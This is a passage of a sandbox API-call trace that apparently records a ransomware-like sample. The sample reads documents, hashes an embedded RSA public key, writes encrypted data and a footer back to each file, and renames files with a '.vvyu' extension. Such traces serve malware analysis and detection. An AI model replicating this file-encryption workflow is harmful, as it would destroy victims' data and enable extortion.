| out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade938 | out: hHeap=0x2c0000) returned 1 [0199.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.483] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x17ffc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x17ffc, lpOverlapped=0x0) returned 1 [0199.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.485] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18001, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.485] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.486] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.487] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.487] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.487] CloseHandle (hObject=0x584) returned 1 [0199.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b9248 [0199.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9248 | out: hHeap=0x2c0000) returned 1 [0199.489] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\NS2nMI.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ns2nmi.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\NS2nMI.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ns2nmi.pptx.vvyu")) returned 1 [0199.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.491] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.494] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3237c250, ftCreationTime.dwHighDateTime=0x1d8992e, ftLastAccessTime.dwLowDateTime=0x90955580, ftLastAccessTime.dwHighDateTime=0x1d8a714, ftLastWriteTime.dwLowDateTime=0x90955580, ftLastWriteTime.dwHighDateTime=0x1d8a714, nFileSizeHigh=0x0, nFileSizeLow=0xa2f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OQlL9b4yk.odp", cAlternateFileName="OQLL9B~1.ODP")) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8eb8 [0199.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0199.495] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\OQlL9b4yk.odp") returned=".odp" [0199.495] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\OQlL9b4yk.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\oqll9b4yk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.495] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=41712) returned 1 [0199.495] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.499] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa2ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.499] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.502] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.502] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa2f0, lpOverlapped=0x0) returned 1 [0199.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.503] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.504] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.504] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.504] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.504] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.504] GetLastError () returned 0x0 [0199.504] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.504] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.505] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.505] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.505] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa2f0) returned 0x2af7168 [0199.505] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade938 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade980 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.506] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6ab8 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.509] GetCurrentThreadId () returned 0x5d8 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5d50 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.509] GetCurrentThreadId () returned 0x5d8 [0199.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.512] RtlAllocateHeap 